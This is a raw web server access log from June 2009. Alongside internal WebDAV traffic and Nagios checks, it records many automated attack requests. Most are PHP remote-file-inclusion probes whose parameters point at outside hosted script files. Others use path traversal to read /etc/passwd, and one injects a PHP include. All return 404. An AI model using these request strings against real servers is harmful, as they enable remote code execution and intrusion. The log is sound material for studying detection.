172.16.1.87 - - [10/Jun/2009:08:36:24 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [10/Jun/2009:08:36:24 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [10/Jun/2009:08:36:24 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
218.249.36.194 - - [10/Jun/2009:08:36:28 -0400] "GET /logs/access_log.Q109053100%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
202.181.98.137 - - [10/Jun/2009:08:36:32 -0400] "GET //modules/Forums/admin/admin_words.php?phpbb_root_path=http://www.mediask2.info/wb/Themes/babylon2/test.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
202.181.98.137 - - [10/Jun/2009:08:36:33 -0400] "GET /logs//modules/Forums/admin/admin_words.php?phpbb_root_path=http://www.mediask2.info/wb/Themes/babylon2/test.txt?? HTTP/1.1" 404 240 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
209.172.33.230 - - [10/Jun/2009:08:36:43 -0400] "GET /logs/error_log.Q109052800//include/admin.lib.inc.php?site_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.812"
209.59.12.99 - - [10/Jun/2009:08:37:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
206.225.92.50 - - [10/Jun/2009:08:38:43 -0400] "GET ///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../etc/passwd HTTP/1.0" 404 209 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [10/Jun/2009:08:38:43 -0400] "GET /logs///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../etc/passwd HTTP/1.0" 404 214 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [10/Jun/2009:08:38:43 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://elgallitoingles.com/images/products/hk? HTTP/1.0" 404 208 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [10/Jun/2009:08:38:43 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://elgallitoingles.com/images/products/hk? HTTP/1.0" 404 213 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
66.226.153.1 - - [10/Jun/2009:08:39:25 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
66.226.153.1 - - [10/Jun/2009:08:39:25 -0400] "GET /logs/access_log.Q109052800//include/admin.lib.inc.php?site_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
66.226.153.1 - - [10/Jun/2009:08:39:26 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
66.226.153.1 - - [10/Jun/2009:08:39:39 -0400] "GET /logs/error_log.Q109052800//include/admin.lib.inc.php?site_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
172.16.1.168 - - [10/Jun/2009:08:39:47 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [10/Jun/2009:08:39:47 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [10/Jun/2009:08:39:47 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:39:51 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:39:51 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:08:39:51 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [10/Jun/2009:08:40:47 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [10/Jun/2009:08:40:47 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [10/Jun/2009:08:40:47 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
87.19.247.39 - - [10/Jun/2009:08:40:48 -0400] "GET /logs/access_log.Q109052800//include/footer.php?_path[counter]=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.820"
87.19.247.39 - - [10/Jun/2009:08:40:48 -0400] "GET //include/footer.php?_path[counter]=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 217 "-" "libwww-perl/5.820"
87.19.247.39 - - [10/Jun/2009:08:40:49 -0400] "GET /logs//include/footer.php?_path[counter]=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.820"
172.16.1.168 - - [10/Jun/2009:08:40:52 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [10/Jun/2009:08:40:52 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [10/Jun/2009:08:40:52 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
87.19.247.39 - - [10/Jun/2009:08:41:56 -0400] "GET /logs/access_log.Q109052800//include/footer.php?_path[counter]=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.820"
87.19.247.39 - - [10/Jun/2009:08:41:56 -0400] "GET //include/footer.php?_path[counter]=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 217 "-" "libwww-perl/5.820"
87.19.247.39 - - [10/Jun/2009:08:41:57 -0400] "GET /logs//include/footer.php?_path[counter]=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.820"
172.16.1.87 - - [10/Jun/2009:08:42:03 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [10/Jun/2009:08:42:03 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [10/Jun/2009:08:42:03 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [10/Jun/2009:08:42:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.143.98.5 - - [10/Jun/2009:08:42:50 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
123.143.98.5 - - [10/Jun/2009:08:42:51 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
123.143.98.5 - - [10/Jun/2009:08:42:51 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
123.143.98.5 - - [10/Jun/2009:08:42:52 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
122.147.76.76 - - [10/Jun/2009:08:42:52 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Gaisbot/3.0+(robot06@gais.cs.ccu.edu.tw;+http://gais.cs.ccu.edu.tw/robot.php)"
123.143.98.5 - - [10/Jun/2009:08:42:55 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
123.143.98.5 - - [10/Jun/2009:08:42:55 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
70.85.165.10 - - [10/Jun/2009:08:43:19 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:43:19 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:43:20 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:43:30 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:43:30 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:43:30 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:43:33 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:43:33 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:43:33 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
69.237.82.158 - - [10/Jun/2009:08:44:55 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
69.237.82.158 - - [10/Jun/2009:08:44:55 -0400] "GET /errors.php?error=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
172.16.1.87 - - [10/Jun/2009:08:45:17 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [10/Jun/2009:08:45:17 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [10/Jun/2009:08:45:17 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
87.19.247.39 - - [10/Jun/2009:08:45:17 -0400] "GET /logs/error_log.Q109052800//include/footer.php?_path[counter]=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.820"
69.237.82.158 - - [10/Jun/2009:08:45:21 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.814"
69.237.82.158 - - [10/Jun/2009:08:45:22 -0400] "GET /errors.php?error=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.814"
69.237.82.158 - - [10/Jun/2009:08:45:22 -0400] "GET /logs/errors.php?error=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.814"
70.85.165.10 - - [10/Jun/2009:08:45:31 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:45:34 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:45:38 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
77.221.130.17 - - [10/Jun/2009:08:46:09 -0400] "GET //include/write.php?dir=http://rsh.kiev.ua/dama/idfx1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
77.221.130.17 - - [10/Jun/2009:08:46:09 -0400] "GET /logs/access_log.Q109051800%20%20//include/write.php?dir=http://rsh.kiev.ua/dama/idfx1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
77.221.130.17 - - [10/Jun/2009:08:46:09 -0400] "GET /logs//include/write.php?dir=http://rsh.kiev.ua/dama/idfx1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
87.19.247.39 - - [10/Jun/2009:08:46:14 -0400] "GET /logs/error_log.Q109052800//include/footer.php?_path[counter]=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.820"
172.16.1.87 - - [10/Jun/2009:08:46:25 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [10/Jun/2009:08:46:25 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [10/Jun/2009:08:46:25 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
77.221.130.17 - - [10/Jun/2009:08:46:48 -0400] "GET /logs/access_log.Q108112300%20%20//include/write.php?dir=http://rsh.kiev.ua/dama/idfx1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:08:46:49 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://aboutav.com//id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:08:46:49 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://aboutav.com//id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:08:46:49 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://aboutav.com//id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jun/2009:08:47:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.78 - - [10/Jun/2009:08:47:43 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.78 - - [10/Jun/2009:08:47:43 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.78 - - [10/Jun/2009:08:47:43 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
77.243.235.164 - - [10/Jun/2009:08:47:44 -0400] "GET /logs/error_log.Q109050800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mistrider.com/samphpwebkk/images/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
77.243.235.164 - - [10/Jun/2009:08:47:44 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mistrider.com/samphpwebkk/images/fx29id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
77.243.235.164 - - [10/Jun/2009:08:47:45 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mistrider.com/samphpwebkk/images/fx29id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:08:48:18 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://aboutav.com//id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:08:48:18 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://aboutav.com//id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:08:48:18 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://aboutav.com//id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:48:37 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:48:37 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:48:37 -0400] "GET /logs/access_log.Q109052300%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:48:50 -0400] "GET /logs/access_log.Q109052300//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:48:50 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:48:50 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:48:53 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:48:53 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:48:53 -0400] "GET /logs/access_log.Q109052300//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:49:05 -0400] "GET /logs/access_log.Q109052500%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:49:11 -0400] "GET /logs/access_log.Q109052500//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:49:17 -0400] "GET /logs/access_log.Q109052500//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:49:44 -0400] "GET /logs/access_log.Q109052300//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:49:44 -0400] "GET /logs/access_log.Q109052500//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
206.225.92.50 - - [10/Jun/2009:08:50:38 -0400] "GET /logs///modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=../../../../../../../../etc/passwd HTTP/1.0" 404 247 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
218.249.36.194 - - [10/Jun/2009:08:50:39 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://aboutav.com//id1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
206.225.92.50 - - [10/Jun/2009:08:50:39 -0400] "GET /logs//modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://elgallitoingles.com/images/products/hk? HTTP/1.0" 404 246 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
80.74.64.27 - - [10/Jun/2009:08:50:47 -0400] "GET /logs/error_log.Q108032700//skin/zero_vote/setup.php?dir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
80.74.64.27 - - [10/Jun/2009:08:50:48 -0400] "GET //skin/zero_vote/setup.php?dir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
80.74.64.27 - - [10/Jun/2009:08:50:49 -0400] "GET /logs//skin/zero_vote/setup.php?dir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
80.74.64.27 - - [10/Jun/2009:08:50:53 -0400] "GET /logs/error_log.Q108032700//skin/zero_vote/login.php?dir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
80.74.64.27 - - [10/Jun/2009:08:50:53 -0400] "GET //skin/zero_vote/login.php?dir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
80.74.64.27 - - [10/Jun/2009:08:50:54 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
80.74.64.27 - - [10/Jun/2009:08:50:54 -0400] "GET /logs/error_log.Q108032700/bbs/skin/zero_vote/error.php?dir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
80.74.64.27 - - [10/Jun/2009:08:50:55 -0400] "GET /bbs/skin/zero_vote/error.php?dir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
80.74.64.27 - - [10/Jun/2009:08:50:56 -0400] "GET /logs/bbs/skin/zero_vote/error.php?dir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
80.74.64.27 - - [10/Jun/2009:08:51:05 -0400] "GET /logs/error_log.Q108032700//skin/zero_vote/error.php?dir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
80.74.64.27 - - [10/Jun/2009:08:51:06 -0400] "GET //skin/zero_vote/error.php?dir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
80.74.64.27 - - [10/Jun/2009:08:51:06 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
80.74.64.27 - - [10/Jun/2009:08:51:06 -0400] "GET /logs/error_log.Q109012900//skin/zero_vote/setup.php?dir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
172.16.1.79 - - [10/Jun/2009:08:51:07 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.79 - - [10/Jun/2009:08:51:07 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.79 - - [10/Jun/2009:08:51:07 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
80.74.64.27 - - [10/Jun/2009:08:51:11 -0400] "GET /logs/error_log.Q109012900//skin/zero_vote/login.php?dir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
80.74.64.27 - - [10/Jun/2009:08:51:13 -0400] "GET /logs/error_log.Q109012900/bbs/skin/zero_vote/error.php?dir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
80.74.64.27 - - [10/Jun/2009:08:51:22 -0400] "GET /logs/error_log.Q109012900//skin/zero_vote/error.php?dir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
70.85.165.10 - - [10/Jun/2009:08:51:23 -0400] "GET /logs/access_log.Q109052300%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:51:25 -0400] "GET /logs/access_log.Q109052300%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:51:46 -0400] "GET /logs/access_log.Q109052500%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:08:51:49 -0400] "GET /logs/access_log.Q109052500%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:08:52:24 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:08:52:24 -0400] "GET /logs/access_log.Q109052300%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
